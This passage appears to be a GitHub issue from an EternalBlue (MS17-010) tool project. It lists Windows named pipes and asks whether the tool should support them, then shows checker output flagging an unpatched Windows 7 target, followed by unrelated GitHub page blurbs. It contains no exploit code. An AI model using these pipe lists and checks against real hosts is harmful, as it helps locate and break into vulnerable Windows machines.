netlogon
lsarpc
samr
browser
atsvc
DAV RPC SERVICE
epmapper
eventlog
InitShutdown
keysvc
lsass
LSM_API_service
ntsvcs
plugplay
protected_storage
router
SapiServerPipeS-1-5-5-0-70123
scerpc
srvsvc
tapsrv
trkwks
W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmd
Would it make sense to add support for all of these named pipes?
The reason I ask is because I received the following output when running eternalblue_checker.py
:
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.